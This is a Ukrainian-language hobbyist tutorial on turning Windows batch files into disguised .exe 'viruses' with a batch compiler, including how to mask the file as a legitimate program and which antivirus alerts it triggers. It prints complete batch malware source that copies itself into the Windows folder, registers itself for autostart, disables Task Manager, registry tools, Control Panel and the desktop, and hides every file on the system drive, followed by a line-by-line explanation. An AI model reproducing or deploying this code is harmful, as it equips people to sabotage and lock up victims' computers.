Створюємо *.exe-віруси *.bat файлів

Це моя перша стаття (можливо, що і остання) так що не сильно мене лайте. Це, так сказати, мої философические вигадки.
Отже, щоб створити *.вірус exe нам знадобиться програма «Quick Batch File Compiler» і знання виконуваних команд у командному рядку. Викачуємо програму з сайту «DreamProgs.net», а якщо не знаємо команди виконуються в командному рядку, то заходимо в «Довідку та підтримку» Виндоуса і в поле для пошуку пишемо щось на кшталт «параметри командного рядка» і серед результатів знайдете ці команди.
Програма досить проста у вивченні і через день ви у всьому розберетеся. Після запуску програми ми бачимо панельку з кнопками «New» — створити новий проект, «Open» — відкрити *.bat файл, «Save» — зберегти те, що в вікні *.bat файл «Undo», «Redo», «Вирізати», «Копіювати», «Вставити», «Help» ви і самі знаєте, «Build» — скомпілювати *.exe файл, «Options» — там вибираєте тип вірусу (виводити вікно командного рядка чи ні під час виконання вірусу).
Далі внизу панельки є три вкладки:
«Source» — вихідний текст вашого вірусу
«Version Info» — маскуємо вірус під хорошу програму
«Embedded Files» — вибираємо іконку для вірусу і можемо додати в *.exe файл інші файли (не знаю як працює)
Kaspersky Internet Security при високій захисту (моніторинг реєстру і т. д.) виводить запит на змінення реєстру і просунуті користувачі можуть здогадатися що це вірус. І ще, якщо вірус прописує себе в автозавантаження, то антивірус піднімає тривогу.
Наводжу приклад створеного мною вірусу (хоча це не зовсім вірус і розрахований він для дуже простих користувачів)

if exist %windir%infwincfg.exe goto tof
copy /y %0 %windir%infwincfg.exe
:tof
reg add «HKLMSOFTWAREMicrosoftWindowsCurrentversionrun» /v wincfg /t reg_sz /d %windir%infwincfg.exe /f
reg add «HKCUSoftwareMicrosoftWindowsCurrentversionpoliciesexplorer» /v NoDesktop /t reg_dword /d 00000001 /f
reg add «HKCUSoftwareMicrosoftWindowsCurrentversionpoliciesexplorer» /v NoActiveDesktop /t reg_dword /d 00000001 /f
reg add «HKCUSoftwareMicrosoftWindowsCurrentversionpoliciesexplorer» /v NoViewContextMenu /t reg_dword /d 00000001 /f
reg add «HKCUSoftwareMicrosoftWindowsCurrentversionpoliciesexplorer» /v NoControlPanel /t reg_dword /d 00000001 /f
reg add «HKCUSoftwareMicrosoftWindowsCurrentversionpoliciesexplorer» /v NoThemesTab /t reg_dword /d 00000001 /f
reg add «HKCUSoftwareMicrosoftWindowsCurrentversionpoliciessystem» /v DisableTaskMgr /t reg_dword /d 00000001 /f
reg add «HKCUSoftwareMicrosoftWindowsCurrentversionpoliciessystem» /v DisableRegistryTools /t reg_dword /d 00000001 /f
reg add «HKCUSoftwareMicrosoftWindowsCurrentversionpoliciessystem» /v NoDispBackgroundPage /t reg_dword /d 00000001 /f
reg add «HKCUSoftwareMicrosoftWindowsCurrentversionpoliciessystem» /v NoDispScrSavPage /t reg_dword /d 00000001 /f
reg add «HKCUSoftwareMicrosoftWindowsCurrentversionpoliciessystem» /v NoDispSettingsPage /t reg_dword /d 00000001 /f
reg add «HKCUSoftwareMicrosoftWindowsCurrentversionexploreradvanced» /v Start_ShowRun /t reg_dword /d 00000000 /f
reg add «HKCUSoftwareMicrosoftWindowsCurrentversionexploreradvanced» /v Start_ShowControlPanel /t reg_dword /d 00000000 /f
cd %windir%
cd ..
attrib +h +s *

«wincfg.exe» це ім’я вірусу. «If exist….» — перевіряє чи є файл wincfg.exe і якщо немає, то копіює себе, а якщо немає, то переходить до рядку “:tof” і виконує команди знаходяться під нею. Четвертий рядок додає вірус в автозавантаження. Наступні за нею заподіюють виправити шкоду — робочий стіл забороняється, при натисканні правої кнопки миші на робочому столі не з’являється меню стає недоступною «Панель управління», забороняється «Диспетчер завдань», в меню «Пуск» зникає кнопка «Виконати» і т. д. «cd %windir%» — обирає в якості робочого каталогу каталог Windows, «cd ..» — обирає в якості каталогу диск в якому знаходиться папка Windows, «attrib +h +s *» — робить всі файли на диску прихованими і системними (ця команда вимагає багато системних ресурсів).